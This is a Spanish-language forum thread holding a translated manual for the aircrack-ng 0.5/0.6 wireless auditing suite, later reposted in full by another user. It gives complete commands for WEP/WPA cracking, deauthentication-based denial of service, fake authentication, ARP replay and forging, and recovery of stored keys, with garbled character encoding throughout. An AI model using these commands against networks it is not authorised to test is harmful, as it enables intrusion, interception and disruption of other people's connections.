Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
09-02-2010, 13:39:52 (Martes)
Inicio Ayuda Ingresar Registrarse
Noticias: El Mercadillo de CiudadWireless

 
Portes gratis para usuarios del foro en www.ciudadwireless.com
+  Seguridad Wireless - Wifi
|-+  Gadgets Sin Cables
| |-+  Universo Wireless
| | |-+  Manuales wireless
| | | |-+  manual aircrack-ng0.5 y 0.6
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 Ir Abajo Imprimir
Autor Tema: manual aircrack-ng0.5 y 0.6  (Leído 91540 veces)
thefkboss
Colaborador
******
Desconectado Desconectado

Mensajes: 645



« : 21-06-2006, 20:02:22 (Mircoles) »

Bueno esta es una traducci贸n del nuevo aircrack con las nuevas opciones

驴Como usar aircrack-ng0.5 y 0.6?

aircrack-ng [opciones] <arichvo(s) de captura>


Los arichvo(s) de captura pueden estar en formato cap o ivs.



Aqui tenemos el aircrack-ng 0.6



ivstools

Esta es una utilidad muy buena ya q sirve para:


1潞)unir archivos ivs en uno solo usamaos el siguiente comando:

Citar
ivstools --merge captura1.ivs captura2.ivs captura3.ivs archivofinal.ivs


siendo captura(s) los archivos q queremos unir y archivofinal el q nos generara como uni贸n de los anteriores

2潞)Para convertir un archivo con extensi贸n cap en ivs:

Citar
ivstools --captura.cap archivofinal.ivs


makeivs

Es una utilidad q nos permite crear un archivo con extension ivs con la clave q nosostros le a帽adamos(es solo para hacer pruebas no sirve para nada mas)

Citar
makeivs.exe  captura.ivs  866578388f517be0b4818a0db1

siendo captura el archivo inventado y 866578388f517be0b4818a0db1la clave inventada

Airmon-ng

Sirve para poner nuestra tarjeta en modo monitor antes de empezar a capturar trafico debemos poner nuestra tarjeta en modo monitor usando este script para ello tecleamos:

Citar
airmon-ng <start/stop> <dispositivo> [canal]

start: para activar el modo monitor.
stop: para parar el modo monitor.
dispositivo: nuestra tarjeta (ath0, eth0, raw0.....)


Airodump-ng



Descripci贸n

Se usa para capturar datos trasmitidos a traves del protocolo 802.11 y en particular para la captura y recoleccci贸n de IVs (vectores iniciales) de los paquetes WEP con la intenci贸n de usar aircrack-ng. Si existe un receptor GPS conectado al ordenador airodump-ng muestra las condernadas del AP.


Uso

Antes de usarlo debes haber iniciado el script airmon-ng para que se muestren los dispositivos wireless que posees y para activar el modo monitor.Puedes, pero no se recomienda que ejecutes Kismet y airodump al mismo tiempo.


Citar
airodump-ng [opcione(s)] <dispositivo>


OPCIONES:

   --ivs: Captura solo ivs
   --gpsd: Para usar un dispositivo Gps
   --write   <nombre del archivo a guardar> :crea un archivo del nombre que le hallamos puestos y con las extensi贸n(.cap 贸 .ivs)y empieza a capturar.
   -w: es lo mismo que poner write
   --beacons: Guarda los beacons, por defecto no los guarda.


Por defecto airodump captura todos los canales que se encuentren dentro de la frecuencia 2,4 Ghz.


   --channel :Captura el canal especificado
   --c: Lo mismo que escribir channel
   -a: Captura en la frecuencia de 5Ghz especifica del canal a
   --abg: Captura tanto en frecuencias de 2,4Ghz como en 5 Ghz



Para configurar correctamente los comandos debemos seguir el orden en el que estan esrcitos en este texto y omitir el comando que no deseemos modificar:

Ejemplos:

Citar
airodump-ng --ivs -w prueba -c 11 -abg ath0

capturar铆ra solo ivs creando un archivo llamado prueba en el canal 11 tanto en a/b/g

Citar
airodump-ng -w prueba -c 11 -abg ath0

capturar铆a creando un archivo cap llamado prueba en el canal 11 tanto en a/b/g



*Airodump oscila entre WEP y WPA.
Esto ocurre cuando tu controlador no desecha los paquetes corruptos (los que tienen CRC inv谩lido). Si es un  ipw2100 (Centrino b), simplemente no tiene arreglo; ve y compra una tarjeta mejor. Si es una Prism2, prueba a actualizar el firmware.


*驴 Cu谩l es el significado de los campos mostrados por airodump ?

airodump-ng mostrar谩 una lista con los puntos de acceso detectados, y tambi茅n una lista de clientes conectados o estaciones ("stations").






 








Aireplay-ng

Se pueden realizar 5 ataques diferentes:

Ataque 0: Desautenticacion
Ataque 1: Autenticacion falsa
Ataque 2: Seleccion intereactiva del paquete a enviar
Ataque 3: Reinyecci贸n de petici贸n ARP
Ataque 4: El "chopchop" de KoreK (predicci贸n de CRC)


Ataque 0: Desautenticacion

Este ataque se puede utilizar para varios propositos:

*Capturar el WPA Handshake

Para ello debemos poner el siguiente comando

Citar
aireplay-ng -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0

0 significa desautenticacion de cliente sirve para q se vuelva a sociar, vaciando de esta forma el cache y por lo tanto volviendo a enviar su handshake.

-a 00:13:10:30:24:9C Seria el AP

-c 00:09:5B:EB:C5:2B Seria una Station asociada a esa AP. Si omitimos esta ultima parte el ataque se realiza sobre todos las Station conectadas a ese AP.

ath0Es nuestra tarjeta segun los diversos modelos de tarjeta (chip) varia wlan0, eth0, ra0....

*Reinyeccion ARP

Citar
aireplay-ng -0 10 -a 00:13:10:30:24:9C ath0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B ath0
como podemos observar el primer comando es una desautenticacion seguida de una reinyeccion de los paquetes obetenidos se supone que al haber vaciado la cahe del cliente y volverse a conectar vuleve a enviar la contrase帽a   
-b 00:13:10:30:24:9C Seria el AP
-h 00:09:5B:EB:C5:2B Seria el cliente



*Denegacion del servicio a clientes conectados

Se vasa en el envio continuo de paquetes de desautenticacion con la consiguiente imposibilidad del cliente(s) de conectarse


Citar
aireplay-ng -0 0 -a 00:13:10:30:24:9C ath0

0hace que envie paquetes continuamente a culaquier Station conectado a ese AP si solo queremos uno en particular enviariamos con el comando
Citar
aireplay-ng -0 0 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0




Ataque 1: Autenticacion falsa


Este ataque es solamente  exitoso cuando necesitamos un cliente asociado al AP para realizar los ataques 2, 3, 4 (-h opcion)  y no lo tenemos.Por lo tamnto consiste en crear nosotros mismos un cliente q se asociara a ese AP.Hay que recordar llegando a este punto que simepre sera mejor un cliente verdadero ya que el falso no genera trafico ARP.

Se recomienda que antes de realizar este atque cambiemos nuetra direccion MAC de la tarjeta para que envie corectamente ACKs(peticiones).


Citar
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Una vez realizado esto lanzamos el ataque de la siguiente forma

Citar
aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)

'the ssid' sin las comillas es el nombre del AP
00:11:22:33:44:55 Cliente falso


Con los CVS 2005-08-14 madwifi parcheados, es posible inyectar paquetes estando en modo Infraestructura (la clave WEP en s铆 misma no importa, en tanto que el AP acepte autenticaci贸n abierta). Por lo que, en lugar de usar el ataque 1, puedes s贸lo asociarte e inyectar / monitorizar a trav茅s de la interfaz athXraw:

Citar
ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up

Citar
sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6

Entonces puedes ejecutar el ataque 3 o el 4 (abajo, aireplay reemplazar谩 autom谩ticamente ath0 por ath0raw):

Citar
aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0



Citar
aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Citar
Este ataque mencionado anteriormente hay muchas veces que falla y no es 100% seguro ya que ha sido probado por muchos de nosotros.El AP es cierto que escupe ivs pero hay veces que al intentar sacar la clave descubrimos que la clave es la introducida por nosotros por lo tanto no serviria de nada

Algunos puntos de acceso requieren de reautentificaci贸n cada 30 segundos, si no nuestro cliente falso ser谩 considerado desconectado. En este caso utiliza el retardo de re-asociaci贸n peri贸dica:

Citar
aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

si en vez de 30 segundos queremos 20 pues escribimos 20 si fuesen 10 modificamos por 10 y asi sucesivamente

Si este ataque parece fallar (aireplay permanece enviando paquetes de petici贸n de autenticaci贸n), puede que est茅 siendo usado un filtrado de direcciones MAC. Aseg煤rate tambi茅n de que:

Est谩s lo suficientemente cerca del punto de acceso, pero ojo no demasiado porque tambi茅n puede fallar.
El controlador est谩 correctamente parcheado e instalado.
La tarjeta est谩 configurada en el mismo canal que el AP.
El BSSID y el ESSID (opciones -a / -e) son correctos.
Si se trata de Prism2, aseg煤rate de que el firmware est谩 actualizado.





Ataque 2: Seleccion intereactiva del paquete a enviar


Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona resultados m谩s efectivos que el ataque 3 (reinyecci贸n autom谩tica de ARP).

Podr铆as usarlo, por ejemplo, para intentar el ataque "redifundir cualesquiera datos", el cu谩l s贸lo funciona si el AP realmente reencripta los paquetes de datos WEP:

Citar
aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

Tambi茅n puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP encriptacas con WEP, cuyo tama帽o es bien 68 o 86 bytes (dependiendo del sistema operativo):


Citar
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

Citar
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0



Otra buena idea es capturar una cierta cantidad de trafico y echarle un ojo con etheral.Si creemos al examinar el trafico q hay dos paquetes q parecen una peticion y una respuesta(Un cliente envia un paquete y poco despues el destinatario responde a este) entonces es una buena idea intentar reinyectar el paquete peticion para obtener paquetes respuestas





Ataque 3: Reinyecci贸n de petici贸n ARP

El cl谩sico ataque de reinyecci贸n de petici贸n ARP es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. Necesitas o bien la direcci贸n MAC de un cliente asociado (00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1 (00:11:22:33:44:55). Puede que tengas que esperar un par de minutos, o incluso m谩s, hasta que aparezca una petici贸n ARP; este ataque fallar谩 si no hay tr谩fico.

Por favor, f铆jate en que tambi茅n puedes reutilizar una petici贸n ARP de una captura anterior usando el interruptor -r .


Citar
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...



El "chopchop" de KoreK (predicci贸n de CRC)


Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP din谩mica. Este ataque no recupera la clave WEP en s铆 misma, sino que revela meramente el texto plano. De cualquier modo, la mayor铆a de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes.Si el AP tira paquetes menores de 42 bytes aireplay trata de adivinar el resto de la informacion q le falta, tan pronto como el encabezado se predecible.Si un paquete IP es capturado automaticamente busca el checksum del encabezado
despues de haber adivinado las partes que le faltaban.Este ataque requiere como minimo un paquete WEP (encriptado).


1. Primero, desencriptemos un paquete:


Citar
aireplay-ng -4 ath0


Si esto falla, es debido a que hay veces q el AP tira la informacion porque no sabe de que direcci贸n MAC proviene. En estos casos debemos usar la direci贸n MAC de un cliente que este conectado y que tenga permiso(filtrado MAC activado).


Citar
aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0



2. Echemos un vistazo a la direcci贸n IP:

Citar
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1


3. Ahora, forjemos una petici贸n ARP.


La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La direcci贸n MAC inicial debe corresponder a una estaci贸n asociada.



 
Citar
arpforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap


4. Y reenviemos nuestra petici贸n ARP forjada:


Citar
aireplay-ng -2 -r arp.cap ath0





Airedecap-ng

Sirve para desecriptar los paquetes capturados una vez optenida la clave ya sea WEP o WPA

airdecap-ng [opciones] <archivo pcap>




Ejemplos:

Citar
airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap
airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap
airdecap-ng -e 'the ssid' -p passphrase  tkip.cap



Wzcook

Sirve para recuperar las claves WEP de la utilidad de XP Wireless Zero Configuration. 脡ste es un software experimental, por lo que puede que funcione y puede que no, dependiendo del nivel de service pack que tengas.

WZCOOK mostrar谩 el PMK (Pairwise Master Key), un valor de 256-bit que es el resultado de codificar 8192 veces la contrase帽a junto con el ESSID y la longitud del ESSID. La contrase帽a en s铆 no se puede recuperar -- de todos modos, basta con conocer el PMK para conectar con una red inal谩mbrica protegida mediante WPA con wpa_supplicant (ver el Windows README). Tu archivo de configuraci贸n wpa_supplicant.conf deber铆a quedar as铆:

Citar
network={
   ssid="my_essid"
   pmk=5c9597f3c8245907ea71a89d[...]9d39d08e


Si no usas WZC pero usas la utilidad USR, accede al registro:

Citar
HKey_Current_User/Software/ACXPROFILE/profilename/dot11WEPDefaultKey1


« Última modificación: 28-03-2008, 03:22:27 (Viernes) por unbAs » En línea
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12508



WWW
« Respuesta #1 : 25-06-2006, 20:56:15 (Domingo) »

sere capullo si esta aki, je je
En línea

Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12508



WWW
« Respuesta #2 : 25-06-2006, 21:10:52 (Domingo) »

http://img370.imageshack.us/img370/92/aircrack8yt.jpg

necesito una imagen mas peque帽a
En línea

thefkboss
Colaborador
******
Desconectado Desconectado

Mensajes: 645



« Respuesta #3 : 25-06-2006, 21:23:57 (Domingo) »

asi o mas peque帽a es q si la reduco mas pierde calidad
En línea
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12508



WWW
« Respuesta #4 : 25-06-2006, 21:44:23 (Domingo) »

Voy a ver.

Pero no la tienes en texto.

Asi la ajusto yo a lo que quiera

http://hwagm.elhacker.net/htm/aircrack-ng.htm
En línea

Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12508



WWW
« Respuesta #5 : 25-06-2006, 21:46:33 (Domingo) »

la has clavado, queda perfecto

http://hwagm.elhacker.net/htm/aircrack-ng.htm
En línea

Elena_FranciX
*****
Desconectado Desconectado

Mensajes: 978


Mordedor@


« Respuesta #6 : 28-01-2007, 16:23:31 (Domingo) »

con t煤 permiso voy a sacar la versi贸n del manual, mini-tuto de los dispositivos de manos:


Comenzando por Nokia Maemo 770 AQUI que dispone de esta misma versi贸n aricrack-ng 05


y despues si me quedan ganas con la Zaurus, que ya cuenta con su propia versi贸n 07, igual que una distro mayor...


La versi贸n del manual de uso de Kismet Nokia 770 AQU脥 ya esta lista


Me temo que son usos y soft que no ponen m谩s en pr谩ctica debido al desconocimeinto de los mismos


Y pido t煤 permiso por que la estructura b谩sica del manuale star basado en t煤 trabajo, me parece un desperdicio volver a retomar todo teniendo la mayor parte hecha, eso si, estara adaptada a los usos y dispositivos de mano, que poco, pero varian en cosas...


Con la mencion de tu autoria por supuesto, yo al tiempo que preparo mi chuleta de mano, pues me entretengo en hacer el mino how to... que ilustrare en fotos m谩s delante desde las ventanas de los dispositivos de mano
En línea
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12508



WWW
« Respuesta #7 : 29-01-2007, 01:51:21 (Lunes) »

yo creo que no hay ningun problema
En línea

luishoyl
*
Desconectado Desconectado

Mensajes: 1


« Respuesta #8 : 21-12-2008, 07:15:39 (Domingo) »

Bueno esta es una traducci贸n del nuevo aircrack con las nuevas opciones

驴Como usar aircrack-ng0.5 y 0.6?

aircrack-ng [opciones] <arichvo(s) de captura>


Los arichvo(s) de captura pueden estar en formato cap o ivs.



Aqui tenemos el aircrack-ng 0.6



ivstools

Esta es una utilidad muy buena ya q sirve para:


1潞)unir archivos ivs en uno solo usamaos el siguiente comando:

Citar
ivstools --merge captura1.ivs captura2.ivs captura3.ivs archivofinal.ivs


siendo captura(s) los archivos q queremos unir y archivofinal el q nos generara como uni贸n de los anteriores

2潞)Para convertir un archivo con extensi贸n cap en ivs:

Citar
ivstools --captura.cap archivofinal.ivs


makeivs

Es una utilidad q nos permite crear un archivo con extension ivs con la clave q nosostros le a帽adamos(es solo para hacer pruebas no sirve para nada mas)

Citar
makeivs.exe  captura.ivs  866578388f517be0b4818a0db1

siendo captura el archivo inventado y 866578388f517be0b4818a0db1la clave inventada

Airmon-ng

Sirve para poner nuestra tarjeta en modo monitor antes de empezar a capturar trafico debemos poner nuestra tarjeta en modo monitor usando este script para ello tecleamos:

Citar
airmon-ng <start/stop> <dispositivo> [canal]

start: para activar el modo monitor.
stop: para parar el modo monitor.
dispositivo: nuestra tarjeta (ath0, eth0, raw0.....)


Airodump-ng



Descripci贸n

Se usa para capturar datos trasmitidos a traves del protocolo 802.11 y en particular para la captura y recoleccci贸n de IVs (vectores iniciales) de los paquetes WEP con la intenci贸n de usar aircrack-ng. Si existe un receptor GPS conectado al ordenador airodump-ng muestra las condernadas del AP.


Uso

Antes de usarlo debes haber iniciado el script airmon-ng para que se muestren los dispositivos wireless que posees y para activar el modo monitor.Puedes, pero no se recomienda que ejecutes Kismet y airodump al mismo tiempo.


Citar
airodump-ng [opcione(s)] <dispositivo>


OPCIONES:

   --ivs: Captura solo ivs
   --gpsd: Para usar un dispositivo Gps
   --write   <nombre del archivo a guardar> :crea un archivo del nombre que le hallamos puestos y con las extensi贸n(.cap 贸 .ivs)y empieza a capturar.
   -w: es lo mismo que poner write
   --beacons: Guarda los beacons, por defecto no los guarda.


Por defecto airodump captura todos los canales que se encuentren dentro de la frecuencia 2,4 Ghz.


   --channel :Captura el canal especificado
   --c: Lo mismo que escribir channel
   -a: Captura en la frecuencia de 5Ghz especifica del canal a
   --abg: Captura tanto en frecuencias de 2,4Ghz como en 5 Ghz



Para configurar correctamente los comandos debemos seguir el orden en el que estan esrcitos en este texto y omitir el comando que no deseemos modificar:

Ejemplos:

Citar
airodump-ng --ivs -w prueba -c 11 -abg ath0

capturar铆ra solo ivs creando un archivo llamado prueba en el canal 11 tanto en a/b/g

Citar
airodump-ng -w prueba -c 11 -abg ath0

capturar铆a creando un archivo cap llamado prueba en el canal 11 tanto en a/b/g



*Airodump oscila entre WEP y WPA.
Esto ocurre cuando tu controlador no desecha los paquetes corruptos (los que tienen CRC inv谩lido). Si es un  ipw2100 (Centrino b), simplemente no tiene arreglo; ve y compra una tarjeta mejor. Si es una Prism2, prueba a actualizar el firmware.


*驴 Cu谩l es el significado de los campos mostrados por airodump ?

airodump-ng mostrar谩 una lista con los puntos de acceso detectados, y tambi茅n una lista de clientes conectados o estaciones ("stations").






 








Aireplay-ng

Se pueden realizar 5 ataques diferentes:

Ataque 0: Desautenticacion
Ataque 1: Autenticacion falsa
Ataque 2: Seleccion intereactiva del paquete a enviar
Ataque 3: Reinyecci贸n de petici贸n ARP
Ataque 4: El "chopchop" de KoreK (predicci贸n de CRC)


Ataque 0: Desautenticacion

Este ataque se puede utilizar para varios propositos:

*Capturar el WPA Handshake

Para ello debemos poner el siguiente comando

Citar
aireplay-ng -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0

0 significa desautenticacion de cliente sirve para q se vuelva a sociar, vaciando de esta forma el cache y por lo tanto volviendo a enviar su handshake.

-a 00:13:10:30:24:9C Seria el AP

-c 00:09:5B:EB:C5:2B Seria una Station asociada a esa AP. Si omitimos esta ultima parte el ataque se realiza sobre todos las Station conectadas a ese AP.

ath0Es nuestra tarjeta segun los diversos modelos de tarjeta (chip) varia wlan0, eth0, ra0....

*Reinyeccion ARP

Citar
aireplay-ng -0 10 -a 00:13:10:30:24:9C ath0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B ath0
como podemos observar el primer comando es una desautenticacion seguida de una reinyeccion de los paquetes obetenidos se supone que al haber vaciado la cahe del cliente y volverse a conectar vuleve a enviar la contrase帽a   
-b 00:13:10:30:24:9C Seria el AP
-h 00:09:5B:EB:C5:2B Seria el cliente



*Denegacion del servicio a clientes conectados

Se vasa en el envio continuo de paquetes de desautenticacion con la consiguiente imposibilidad del cliente(s) de conectarse


Citar
aireplay-ng -0 0 -a 00:13:10:30:24:9C ath0

0hace que envie paquetes continuamente a culaquier Station conectado a ese AP si solo queremos uno en particular enviariamos con el comando
Citar
aireplay-ng -0 0 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0




Ataque 1: Autenticacion falsa


Este ataque es solamente  exitoso cuando necesitamos un cliente asociado al AP para realizar los ataques 2, 3, 4 (-h opcion)  y no lo tenemos.Por lo tamnto consiste en crear nosotros mismos un cliente q se asociara a ese AP.Hay que recordar llegando a este punto que simepre sera mejor un cliente verdadero ya que el falso no genera trafico ARP.

Se recomienda que antes de realizar este atque cambiemos nuetra direccion MAC de la tarjeta para que envie corectamente ACKs(peticiones).


Citar
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Una vez realizado esto lanzamos el ataque de la siguiente forma

Citar
aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)

'the ssid' sin las comillas es el nombre del AP
00:11:22:33:44:55 Cliente falso


Con los CVS 2005-08-14 madwifi parcheados, es posible inyectar paquetes estando en modo Infraestructura (la clave WEP en s铆 misma no importa, en tanto que el AP acepte autenticaci贸n abierta). Por lo que, en lugar de usar el ataque 1, puedes s贸lo asociarte e inyectar / monitorizar a trav茅s de la interfaz athXraw:

Citar
ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up

Citar
sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6

Entonces puedes ejecutar el ataque 3 o el 4 (abajo, aireplay reemplazar谩 autom谩ticamente ath0 por ath0raw):

Citar
aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0



Citar
aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Citar
Este ataque mencionado anteriormente hay muchas veces que falla y no es 100% seguro ya que ha sido probado por muchos de nosotros.El AP es cierto que escupe ivs pero hay veces que al intentar sacar la clave descubrimos que la clave es la introducida por nosotros por lo tanto no serviria de nada

Algunos puntos de acceso requieren de reautentificaci贸n cada 30 segundos, si no nuestro cliente falso ser谩 considerado desconectado. En este caso utiliza el retardo de re-asociaci贸n peri贸dica:

Citar
aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

si en vez de 30 segundos queremos 20 pues escribimos 20 si fuesen 10 modificamos por 10 y asi sucesivamente

Si este ataque parece fallar (aireplay permanece enviando paquetes de petici贸n de autenticaci贸n), puede que est茅 siendo usado un filtrado de direcciones MAC. Aseg煤rate tambi茅n de que:

Est谩s lo suficientemente cerca del punto de acceso, pero ojo no demasiado porque tambi茅n puede fallar.
El controlador est谩 correctamente parcheado e instalado.
La tarjeta est谩 configurada en el mismo canal que el AP.
El BSSID y el ESSID (opciones -a / -e) son correctos.
Si se trata de Prism2, aseg煤rate de que el firmware est谩 actualizado.





Ataque 2: Seleccion intereactiva del paquete a enviar


Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona resultados m谩s efectivos que el ataque 3 (reinyecci贸n autom谩tica de ARP).

Podr铆as usarlo, por ejemplo, para intentar el ataque "redifundir cualesquiera datos", el cu谩l s贸lo funciona si el AP realmente reencripta los paquetes de datos WEP:

Citar
aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

Tambi茅n puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP encriptacas con WEP, cuyo tama帽o es bien 68 o 86 bytes (dependiendo del sistema operativo):


Citar
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

Citar
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0



Otra buena idea es capturar una cierta cantidad de trafico y echarle un ojo con etheral.Si creemos al examinar el trafico q hay dos paquetes q parecen una peticion y una respuesta(Un cliente envia un paquete y poco despues el destinatario responde a este) entonces es una buena idea intentar reinyectar el paquete peticion para obtener paquetes respuestas





Ataque 3: Reinyecci贸n de petici贸n ARP

El cl谩sico ataque de reinyecci贸n de petici贸n ARP es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. Necesitas o bien la direcci贸n MAC de un cliente asociado (00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1 (00:11:22:33:44:55). Puede que tengas que esperar un par de minutos, o incluso m谩s, hasta que aparezca una petici贸n ARP; este ataque fallar谩 si no hay tr谩fico.

Por favor, f铆jate en que tambi茅n puedes reutilizar una petici贸n ARP de una captura anterior usando el interruptor -r .


Citar
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...



El "chopchop" de KoreK (predicci贸n de CRC)


Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP din谩mica. Este ataque no recupera la clave WEP en s铆 misma, sino que revela meramente el texto plano. De cualquier modo, la mayor铆a de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes.Si el AP tira paquetes menores de 42 bytes aireplay trata de adivinar el resto de la informacion q le falta, tan pronto como el encabezado se predecible.Si un paquete IP es capturado automaticamente busca el checksum del encabezado
despues de haber adivinado las partes que le faltaban.Este ataque requiere como minimo un paquete WEP (encriptado).


1. Primero, desencriptemos un paquete:


Citar
aireplay-ng -4 ath0


Si esto falla, es debido a que hay veces q el AP tira la informacion porque no sabe de que direcci贸n MAC proviene. En estos casos debemos usar la direci贸n MAC de un cliente que este conectado y que tenga permiso(filtrado MAC activado).


Citar
aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0



2. Echemos un vistazo a la direcci贸n IP:

Citar
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1


3. Ahora, forjemos una petici贸n ARP.


La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La direcci贸n MAC inicial debe corresponder a una estaci贸n asociada.



 
Citar
arpforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap


4. Y reenviemos nuestra petici贸n ARP forjada:


Citar
aireplay-ng -2 -r arp.cap ath0





Airedecap-ng

Sirve para desecriptar los paquetes capturados una vez optenida la clave ya sea WEP o WPA

airdecap-ng [opciones] <archivo pcap>




Ejemplos:

Citar
airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap
airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap
airdecap-ng -e 'the ssid' -p passphrase  tkip.cap



Wzcook

Sirve para recuperar las claves WEP de la utilidad de XP Wireless Zero Configuration. 脡ste es un software experimental, por lo que puede que funcione y puede que no, dependiendo del nivel de service pack que tengas.

WZCOOK mostrar谩 el PMK (Pairwise Master Key), un valor de 256-bit que es el resultado de codificar 8192 veces la contrase帽a junto con el ESSID y la longitud del ESSID. La contrase帽a en s铆 no se puede recuperar -- de todos modos, basta con conocer el PMK para conectar con una red inal谩mbrica protegida mediante WPA con wpa_supplicant (ver el Windows README). Tu archivo de configuraci贸n wpa_supplicant.conf deber铆a quedar as铆:

Citar
network={
   ssid="my_essid"
   pmk=5c9597f3c8245907ea71a89d[...]9d39d08e


Si no usas WZC pero usas la utilidad USR, accede al registro:

Citar
HKey_Current_User/Software/ACXPROFILE/profilename/dot11WEPDefaultKey1



gracias por la respuesta yo ando buscando lo mismo y me gustaria saber cual帽es son los comandos ,
se agradece .
En línea
Páginas: 1 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC
Consejos publicitarios

elhacker